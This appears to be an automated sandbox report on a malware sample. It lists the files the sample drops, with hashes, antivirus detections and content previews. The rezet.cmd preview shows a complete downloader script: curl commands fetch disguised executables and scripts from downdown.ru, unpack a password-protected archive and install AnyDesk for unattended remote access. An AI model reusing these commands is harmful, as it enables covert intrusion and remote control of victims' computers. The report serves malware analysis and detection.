                                                                                                                                                                  Preview:..4t Tray Minimizer Pro 6.07: How to order?..=============================================......(1) Pricing..===========.... A single license with 1-year of updates and support for full .. featured 4t Tray Minimizer Pro 6.07 is $19.95. .. Check latest price at .. http://www.4t-niagara.com/tray_order.html......(2) Full version benefits..=========================.... - All customization settings are stored.. - 1-year of free updates.. - 1-year of technical Support by e-mail.. - New version and updates notification by e-mail.. - Discounts for other products from 4t Niagara Software......(3) Order single license..========================.... The licensed product may be used by one and only one of the .. following ways:.... 1) Personally by a single person, who uses the software on .. one or more computers.... 2) Installed on a single workstation used nonsimultaneously .. by multiple people......(4) How to order..=======================

                                                                                                                                                                  C:\Intel\Trays\order.url

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://www.4t-niagara.com/tray_order.html>), ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):67
                                                                                                                                                                  Entropy (8bit):4.673203928779382
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HRAbABGQYm/0S432ZEZ3xEchXw5RJn:HRYFVm/r4bQchin
                                                                                                                                                                  MD5:7C86A88BA20294EFD1723D14CADC9431
                                                                                                                                                                  SHA1:A5A2E5F5283A462AB6234BDF1F8393B06FFCDF12
                                                                                                                                                                  SHA-256:E22AB4D66DC48DEEEE0142AED2FAB0E38E73D9B2D3AC275C025F3D05C082201E
                                                                                                                                                                  SHA-512:2FB71F3BF84F96635DEFC34CA86D13D805B6B70B815DEC3160E444CB32AC8D5D3790C676D391C4954E2412E7E6A1A431F6548372D099C9DB939CA73AE1BEFA1C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[InternetShortcut]..URL=http://www.4t-niagara.com/tray_order.html..

                                                                                                                                                                  C:\Intel\Trays\product.url

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://www.4t-niagara.com/tray.html>), ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                  Entropy (8bit):4.614282214221932
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HRAbABGQYm/0S432ZEZ3xEcLDJn:HRYFVm/r4bQcPJ
                                                                                                                                                                  MD5:98FF41BD6C4DCFE5257FAFF4AA39E5E6
                                                                                                                                                                  SHA1:2F5EC6409EDA4DF5B025B6DF2F70B525160A83FE
                                                                                                                                                                  SHA-256:8CBFBB70978E889723BF228201E634F55289A7F50F7B9874895A08BE6CEA64ED
                                                                                                                                                                  SHA-512:7C18E2DAB463EEDF117EE9135DE2E7A186C2751F87122F55C0B5F18243064651AF40C146BBC28524FECB817D0881431C52A6FD65D3B233FA6C4F98ABA15EF550
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[InternetShortcut]..URL=http://www.4t-niagara.com/tray.html..

                                                                                                                                                                  C:\Intel\Trays\readme.txt

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6436
                                                                                                                                                                  Entropy (8bit):4.99297727082377
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:+aRuMaCRmK/5kMDV5fA0+1qAZ4DM3KrN5rK+0pSxfJ3GxRQ:buuRmKdDvx+1qYsMGXK+9fJ3GxG
                                                                                                                                                                  MD5:B265E96281ACD6A3EF5BDEF6C1642F1B
                                                                                                                                                                  SHA1:3BB6D53BE5EA3BAD90AFB43612AC83F58D2304AD
                                                                                                                                                                  SHA-256:E73559186F801BC9392554CCE951E481DEA9E652494FBA74EE4A7138A74C90DD
                                                                                                                                                                  SHA-512:9983E34B4F567D6B8A103BBD42E09AE0B0AF539B03F2CB8DFD929D4054B42A13C83D32E738DF1066C43DDDC422DB31DEF7D511CAE8C047249C993BC789F805C7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..4t Tray Minimizer 6.07..===========================......CONTENTS..========....(1) DESCRIPTION..(2) MAIN FEATURES..(3) SYSTEM REQUIREMENTS..(4) SETUP.. Installing 4t Tray Minimizer.. Uninstalling 4t Tray Minimizer..(5) ORDERING FULL VERSION..(6) LICENCE INFORMATION..(7) THIRD-PARTY SOFTWARE..(8) MORE PRODUCTS.. 4t Calendar Reminder MP3.. 4t HIT Mail Privacy.. 4t Web Camera..(9) CONTACT INFORMATION........(1) DESCRIPTION..===============....4t Tray Minimizer lets you running applications minimized as ..System Tray icons, which helps in adjusting free space ..on your taskbar. ....Free version of 4t Tray Minimizer stores the Favorites options ..only for the current session. Check the Comparison Chart between ..Free and Pro versions here:.. .. http:\\www.4t-niagara.com\tray_comparison.html......(2) MAIN FEATURES..=================....Please go to this link:.... http://www.4t-niagara.com/tray.html.. ....(3) SYSTEM REQUIREMENTS..======================

                                                                                                                                                                  C:\Intel\Trays\unins000.dat

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:InnoSetup Log 4t Tray Minimizer, version 0x418, 21084 bytes, VIVOBOOK\\USER\376\, C:\Intel\Trays\376\377\377\007
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):21084
                                                                                                                                                                  Entropy (8bit):3.9125638161274416
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:JCXt8VdouvwpZoD24lhdgBrf1jH0FHRos:JCXyVdoupgBr9H0FHes
                                                                                                                                                                  MD5:8B7C19436A7674B89E2BC8BF1BC628AC
                                                                                                                                                                  SHA1:3EBF6316D997C0894B6B5C36A4BE229354C92821
                                                                                                                                                                  SHA-256:FFC630E3572536E14DAA4A43DA06A38F8C6C70373F700D734CD3FB84E4700504
                                                                                                                                                                  SHA-512:5E1F19C2C30D284EF129369A914648EA32819D9686CD411DBB3078604368E8314CBC762DC50CD71CB3A374C3A0C01BECCE88C3BEF82EF8A37B201289B001735C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Inno Setup Uninstall Log (b)....................................4t Tray Minimizer...............................................................................................................4t Tray Minimizer.......................................................................................................................\R..%...............................................................................................................<0.3........4.U.......Y........V.I.V.O.B.O.O.K......U.S.E.R......C.:.\.I.n.t.e.l.\.T.r.a.y.s..................:.... .....j....r...IFPS....................................................................................................................................................................BOOLEAN..........{...........!MAIN....-1.|...........INITIALIZESETUP....27..REGISTERWINDOWMESSAGE........FINDWINDOWBYCLASSNAME........SENDMESSAGE...........SLEEP........SENDBROADCASTMESSAGE..........ISWIN64...............................`.........rwmQUIT_APP

                                                                                                                                                                  C:\Intel\Trays\unins000.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1203807
                                                                                                                                                                  Entropy (8bit):6.40760510131349
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:JtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt6:3qTytRFk6ek1L9
                                                                                                                                                                  MD5:F713851CFCA66E37F80C8AA949B1B5AA
                                                                                                                                                                  SHA1:BC64DBDEDE8B4AB043A17BF0A1C8C6278E715B7E
                                                                                                                                                                  SHA-256:A57CFD11D66E89572224F2648D1CB2FE71030E572B9CD2CAA08074A992841A91
                                                                                                                                                                  SHA-512:406D168AEF0251A7F18FC2F94EE92EFFBC690B9D9B99D00296061E964C4880B6CCFBB6D7936FEEB75944D8FEE1973BABC55EC6E683D409249E2A81F7BCE6C06E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.......................................@......@..............................@8...0....................................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................

                                                                                                                                                                  C:\Intel\Trays\wishlist.url

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://www.4t-niagara.com/tray_next.html>), ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):66
                                                                                                                                                                  Entropy (8bit):4.665701415423743
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HRAbABGQYm/0S432ZEZ3xEcg6NuJyn:HRYFVm/r4bQc2Jy
                                                                                                                                                                  MD5:E99E79543800A08FEC9EA2D600120CAC
                                                                                                                                                                  SHA1:252A73626CBE72B7597ACD90311C55C331672A91
                                                                                                                                                                  SHA-256:90E0CFB4F27009D58BB61EFCDEA1F767DC0BB860C08820BB05071E720AFF59D6
                                                                                                                                                                  SHA-512:A1C60B2AA2667A7B869275224DAB7FAE4671A5B8ADE8114D69443CA1DC9D1CA15B2150D62548075F4241E3697F09B5B11877961CDFC2D22E7E541D68F77AD792
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[InternetShortcut]..URL=http://www.4t-niagara.com/tray_next.html..

                                                                                                                                                                  C:\Intel\blat.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\curl.exe
                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):245760
                                                                                                                                                                  Entropy (8bit):5.8308335350962235
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:9MrfThXeQPSDOTvVNLSV3T5gV6K1TkGVKYzNJ9DPi:4fThXeZSDSV3T5gV6K1dNJB
                                                                                                                                                                  MD5:34C6DFA28C293B5F21A77F74D94DE16B
                                                                                                                                                                  SHA1:04F02B3A69AF2F6A2FE1FF05BFFA8DFE2E39FA96
                                                                                                                                                                  SHA-256:E613D07619B28F896B4ADF24D888CF52814FA2EB89F261F2E4715485954251B7
                                                                                                                                                                  SHA-512:6BEFDF06B2EEFF8EA1AD4EF82CEBDFDF5E50BE8886C297C16682A973CA14BB2430F34BDDFF6C307641B764DA743447278E5D2145E16B20B8EC6B6A6325C6C479
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\)..=G..=G..=G..=F..=G.."T..=G.q!I..=G.."M.q=G.."L..=G.J;A..=G.Rich.=G.........................PE..L...,v.b.................`...................p....@..........................................................................q..P....................................................................................p...............................text...:Y.......`.................. ..`.rdata.......p.......p..............@..@.data....[.......0..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Intel\curl.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\Yv24LkKBY6.exe
                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1793024
                                                                                                                                                                  Entropy (8bit):6.741879818708683
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:goyH7YomxViffSzoGX0HHdzj2YFvbKRAIM8SUnEtkUdHZZf6zCpSwxoqK9n5Ihq/:Bh76f1FxoQ0SOyFTbTxRPJm9YM
                                                                                                                                                                  MD5:9542F4AC0CAEFA766BD67BA879ED2DD4
                                                                                                                                                                  SHA1:EF93BF4C28FE70A90AE42E64A55900A6CB756EEC
                                                                                                                                                                  SHA-256:78DBE1FBBC7E5F51FA385BE08BB679251E46B43BE690FBC49C412D9D4F647A10
                                                                                                                                                                  SHA-512:26BE5184C394C5FEAB422D3AFBF83E469DFB19DA5F45B70642ACACE742A74DBB8E569A2FEE727D244C7CF220CB8D84DBFEDBA842D0C4F84927746228FDBF68D0
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X......B...B...B.a~B...B..XB3..B..fB...B..YB...B.>rB...B...B...Ba.]Bz.B..bB...Ba.gB...BRich...B........PE..L...A..T.............................'............@.......................................@.................................d...x.......................................8............................w..@............................................text............................... ..`.rdata..H...........................@..@.data....$...........|..............@....rsrc................`..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Intel\dc.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\curl.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):831888
                                                                                                                                                                  Entropy (8bit):6.990827113590936
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:daWzgMg7v3qnCiIErQohh0F4nCJ8lnyhQaQDErWt5x:8aHMv6CErjDnyhQasMix
                                                                                                                                                                  MD5:139464919440E93E49C80CC890B90585
                                                                                                                                                                  SHA1:0237408CDB74AD6B8D340CDF0D03C1B1F820CE17
                                                                                                                                                                  SHA-256:CE3A6224DAE98FDAA712CFA6495CB72349F333133DBFB339C9E90699CBE4E8E4
                                                                                                                                                                  SHA-512:D6993D7568F6B39BF2BA0C0988EB30B9506DC05D50AEF693D22A64C34E0D5CD5BDB32A828B666C9C37F116DEBA63B10CE662B9E42AD1025A7B05EB0B32251A1C
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L......K..........#..................c....... ....@..........................p......| ........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Intel\driver.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\curl.exe
                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):300032
                                                                                                                                                                  Entropy (8bit):6.500047150408548
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:IrughCeBm7vbQlCwPakaBstCRvIX6kth2mbh7:IrlfQ7CsBkCRvI
                                                                                                                                                                  MD5:29086D9247FDF40452563C11B3DCA394
                                                                                                                                                                  SHA1:33B264F85CAA86FCD81E5FD75E654A9A1A4C26C8
                                                                                                                                                                  SHA-256:BB243113D236F823ABD1839025190E763FE34C40DA4949B77558995CC1A07625
                                                                                                                                                                  SHA-512:3DC8E3E61FB1F2D98F7482EAB464CB0C356F5616CC3D3BC74932E39F47D632A4DDC307222B6B219FAE36A0BCA04D0CB09C8DAFF00C15C22C5F1811DB479086AE
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L.....H.................0...................@....@.............................................. ......................g....................................................................p.......................................................text....0.......&.................. ..`.data.... ...@...F...,..............@....tls.........`.......r..............@....rdata.......p.......t..............@..P.idata...............v..............@..@.edata..............................@..@

                                                                                                                                                                  C:\Intel\rezet.cmd

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):713
                                                                                                                                                                  Entropy (8bit):4.917892649368923
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:FAKjySKLGhkJLsQhHQuJLXMzl+JLsRHJL1d6JLJzzXbif2HL179HCRC:FAKjBKLmkJLNJJLXMzl+JLsRHJLP6JLz
                                                                                                                                                                  MD5:1343C0537F621EC3D77D4A899BAE561D
                                                                                                                                                                  SHA1:9E64F779DBB174DABFFC731F289D1A7820047C67
                                                                                                                                                                  SHA-256:C353A708EDFD0F77A486AF66E407F7B78583394D7B5F994CD8D2E6E263D25968
                                                                                                                                                                  SHA-512:ACC2BF71D208DE4FCEF246686FAC025E688DBF8978C5931B083ABF3A594E0B36501E75C67A15E28A9835862755654FAA48310B92F1236473D0F355FE82FE74FB
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:cd C:\Intel\..ping -n 6 127.0.0.1..C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg..C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg..C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg..C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg..C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg..C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg..C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y..start C:\Intel\Trays\Trays.lnk..svchost.exe --install C:\Intel\AnyDesk..C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg.. C:\Intel\AnyDesk\bat.lnk..

                                                                                                                                                                  C:\Intel\svchost.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\curl.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):5331456
                                                                                                                                                                  Entropy (8bit):7.99990183000247
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:98304:K/9YNbhcFtvWK+XJURR51NX6hzzVwDmIoEWXF5fX+LWHF7uC+:KCNbhcF1WKW6whfOjGvAWHM
                                                                                                                                                                  MD5:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  SHA1:6AEDB74E3C6B886A2945323C8789B32891CA12A2
                                                                                                                                                                  SHA-256:7F813D6552F20F2E761807E94C34EDCFE91570A9D637C82C955AE52768367046
                                                                                                                                                                  SHA-512:8E009A0E4398EDBCDB7BEE17F37AE5885935E910348F0FC2FFE838BBFFB2B56BF6DE9BB7F34B08C04DD8ABB1C29C0313006697872D9EBF09950947B96758F16D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........h.}.;.}.;.}.;..";.}.;..#;.}.;...;.}.;...;.}.;Rich.}.;........................PE..L....X.f.........."......*...0Q..T%..........@....@...........................v......Q...@...................................................................v.......%..............................................................................text...w(.......*.................. ..`.itext...T%..@...........................rdata........%.....................@..@.data....&Q...%..$Q..2..............@....reloc........v......VQ.............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\AnyDesk\ad_svc.trace

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):26080
                                                                                                                                                                  Entropy (8bit):4.416846251005514
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:fI0El3Yh2W7ITiN4n5x/ElR/E7XyrOAy0KDishxNzHiABke4WzR3d:fIF62W7ITiN4n5xcIpmsnNzH9Bkm3d
                                                                                                                                                                  MD5:12332DF21456056C864DBB1A2004D50E
                                                                                                                                                                  SHA1:20F5261C7B9B5AA48D2B002609E128B10CF2E3BA
                                                                                                                                                                  SHA-256:8CC48F27041BFF1CA63CC7B7F1058BEB677F8CCABFDE62C6FEB6F2AFB0FE4458
                                                                                                                                                                  SHA-512:ADDB87F17AFC9432AC764E66FE7D43D8E2A71919F17B42648477763C9D06E574903FE778D363C1A125BBA89BF0025E21299943DABA162546B9EC98B2355491F0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: * * * * * * * * * * * * * * * * * *.. info 2025-01-11 06:54:08.387 gsvc 2596 3244 main - * AnyDesk Windows Startup *.. info 2025-01-11 06:54:08.387 gsvc 2596 3244 main - * Version 8.0.14 (release/win_8.0.14 13967ce7c71d8c19a49dd697dbd0dec1c8d166bf).. info 2025-01-11 06:54:08.387 gsvc 2596 3244 main - * Checksum 3b1bfbef334434f66640155f39e4c33b.. info 2025-01-11 06:54:08.387 gsvc 2596 3244 main - * Build 20240822172725.. info 2025-01-11 06:54:08.387 gsvc 2596 3244 main - * Copyright (C) 2024 AnyDesk Software GmbH *.. info 2025-01-11 06:54:08.387 gsvc 2596 3244 main - .. info 2025-01-11 06:54:08.387 gsvc 2596 3244 main - Command Line params: "C:\Intel\AnyDesk\AnyDesk.exe" --ser

                                                                                                                                                                  C:\ProgramData\AnyDesk\cache\device-id.cache

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):312
                                                                                                                                                                  Entropy (8bit):7.12898682468492
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:Ts8QPPZntJty0ceEnKgdK03zn22+8hnDaX6G4EKG0nYX:XQJdy0cdnKgdK4n2ChnDGr4EKGrX
                                                                                                                                                                  MD5:41E341E583F9A081B9BB30C65D4770F7
                                                                                                                                                                  SHA1:494528305B527603DBCEB30CAAA05FDAE6627D22
                                                                                                                                                                  SHA-256:6A82E3081BD24B6510C730EEF937997B504281C295217F2EB2009A7B645FF50D
                                                                                                                                                                  SHA-512:F1E3C91E4CFFD3F4F12EE73D7FACC7B5EC46C3CEC5636394C01B6C5C9C1E0520DE9413641DACB97DE8788991708BEFB3ECE57C75BD87AE52503881B6DAF377C3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........+DID-V1-01945424-5992-7bdf-b342-d8ef8857b0a3......]..Y....E."..~.2t..$.......w)2k.|..x..&H.]..j..$.X1..xr...IH..OY.4.5e.".\fj.i...[.s.......)..;K.w0Q..lt.s22.....PN.t.....{5.>...m.7Kg.N..w.6.\.@.......O.S.m...>......fw...m....Za.+X../......P.x.._..u~.>..m..OJ..}Zj..]Y......D2...(&2....e.+W.r

                                                                                                                                                                  C:\ProgramData\AnyDesk\service.conf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (1747)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3102
                                                                                                                                                                  Entropy (8bit):6.052450964232498
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:uIST6Ribgc734PTJlNjbtmGcPZdsKxIqTFRPtzgk2cwyTjR+ETIyfA4IB1fEfUwH:uISTSifsP3NvGjDfvTxA8An5pf5vS
                                                                                                                                                                  MD5:FF92D48B8B22F04A0E63EA27AA064583
                                                                                                                                                                  SHA1:8E776A8E141BAB1A0F159EB77133F614E180D5CB
                                                                                                                                                                  SHA-256:737B89F699C101B21AC72037B40E1768F127B96180E68DA84FA8D53877D0CA3D
                                                                                                                                                                  SHA-512:A5FBECC0B28A163CECECA7029ED5F5A6778F9DBABC159F5FACC79C45D636C146AF34FECF869BE2985481A70C844FA5634BC650CEED39D0B487DEAC810C23F039
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:ad.anynet.cert=-----BEGIN CERTIFICATE-----\nMIICqDCCAZACAQEwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UEAwwOQW55RGVzayBD\nbGllbnQwIBcNMjUwMTExMDY1NDA5WhgPMjA3NDEyMzAwNjU0MDlaMBkxFzAVBgNV\nBAMMDkFueURlc2sgQ2xpZW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC\nAQEAvZS0nKrjofS3qBYiEdDbAwEr0CD5ogOXMPl1jyZOgozDu8aQazvj3fasjZP/\nqUCf2PETw3sHtqZ64+R8KdnunJ6v5Ik0iy8q3papmXc8Up6ZdBjzhsjPGnhLezXo\nv9HN6Mg1NDNQe7GjCw8T1PkMARNyhlSbbw+m+w5MLOrYFRvPoEsf/tUgrO4c1Oa6\npu3lxJ1gL5IQ8A54lV605sjZ5/J8elU8qqqRq5jC1GP+duXN/VpECUoPJlf7FOFy\n6bKt1LXjDZJFDPDDSn07nTUe35f46Ruz7vRKxx72NDf7WRnKco+ZJc2vY6O7+eO6\nW304X7ri3Zb8qk3Tt1Y3sBuXmQIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQCim5Yq\nwwRYK/8w2aeWqtWkcpiiBp85ckgLEkzXtvmtW8l0mREv/SEaqEIXtvNzww/7Vl0l\n6k7B1eF3vZ5CoRSrOTGcJINHvlyMtSfN5cMJXz2YLMmugXQVEUT4yyGkGulicoUY\nziewLRBrMXr65PNkfy5jkKuwU7rr4tep9VIW1r5UwxI3TrJmI8but8Lw2dkW5DBl\nZjl/+Cl4VQd+U57mD1PO6HQgd0cRXZSeC4UxbUbLxXbLpzpNlUYqQNRW1hsknqpB\nPWVzTAyPni4pNSzkx49NvH02rYhXz9Pd+EGefpEmKoAqYLUs3j/fjlcV1HIHUGO+\nAl5C6duavmdcE7dc\n-----END CERTI

                                                                                                                                                                  C:\ProgramData\AnyDesk\system.conf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\svchost.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1098
                                                                                                                                                                  Entropy (8bit):4.821385179519206
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:bwIK2iBs5sAwAzVp4LtBokn8hCit0kBHSAQ8:d6BIzVpV+2CCz
                                                                                                                                                                  MD5:580FA8EF6FA161815E69E2914418A041
                                                                                                                                                                  SHA1:CDAB6902887F2646BC8C6EF3900C23DD8938BD0B
                                                                                                                                                                  SHA-256:BF99C9B50842ED93C056FBEC5A24B38F1D2F6E883BFCD736685178D0A4A7FDA2
                                                                                                                                                                  SHA-512:4B4B57BD86E9903D6D36ECA8207E14BE88C764FB0EA688C683F5D3E6A4AD2B92A34788FA3E9618F72E3E985FAE960B7E753240078B464B5DF4201FB94F78FEE8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:ad.anynet.alias=.ad.anynet.client_stats_hash=306884cb11712e8039fdd3260842c1810ae277d9.ad.anynet.cur_version=34359803904.ad.anynet.did.hash=631723643.ad.anynet.fpr=d157688fbf05b56aaf757813a0c66ddef3ad57d0.ad.anynet.id=1061403999.ad.anynet.last_relay=relay-30ea2fb5.net.anydesk.com:80:443:6568.ad.anynet.network_id=main.ad.anynet.relay.fatal_result=1.0.ad.anynet.relay.state=2.ad.inst.id=4d843a8b11bc55a386a4bafec1512d4f.ad.license.expiry=0.ad.license.name=free-1.ad.security.frontend_clipboard=1.ad.security.frontend_clipboard_files=1.ad.security.frontend_clipboard_version=1.ad.security.permission_profiles._default.permissions.sas=1.ad.security.permission_profiles._unattended_access.permissions.sas=1.ad.security.permission_profiles._unattended_access.pwd=b0e594085fcdcdd0d970f1c041bce25cf1816bc6bc26463b6fa3daa82a5a0273.ad.security.permission_profiles._unattended_access.salt=b0c8d9209c9bb989a5cc09d7e983dc00.ad.security.permission_profiles.version=1.ad.security.update_channel=main.ad.security.up

                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250111065345Z-170.bmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 154 x -190 x 32, cbSize 117094, bits offset 54
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):117094
                                                                                                                                                                  Entropy (8bit):1.8759596692099052
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:Flmo89wE+GPsXbJGHV4635G+SFhhLywJLtmphVuL18MtIhCT8T8oZZv:8FPstWq6JdlZZv
                                                                                                                                                                  MD5:60D37149B4BA4852E6F7B2A1B7F61C11
                                                                                                                                                                  SHA1:0315A2CA20BCABDE2C037CA41F6DA1A7E15924DD
                                                                                                                                                                  SHA-256:C37512CD94D5F8582B98147803ABCF145FFD210484F242A2366BD2DD78BA7087
                                                                                                                                                                  SHA-512:E1A01A723B46AAE1D90589A9465440FE8393AC55D0E2107E1A1327EF2BA87B719BA333895BC9CE8FF08651F0DEBC22DAEE8A2204EA566FA87BBC1F96D52D61D8
                                                                                                                                                                  Malicious:false
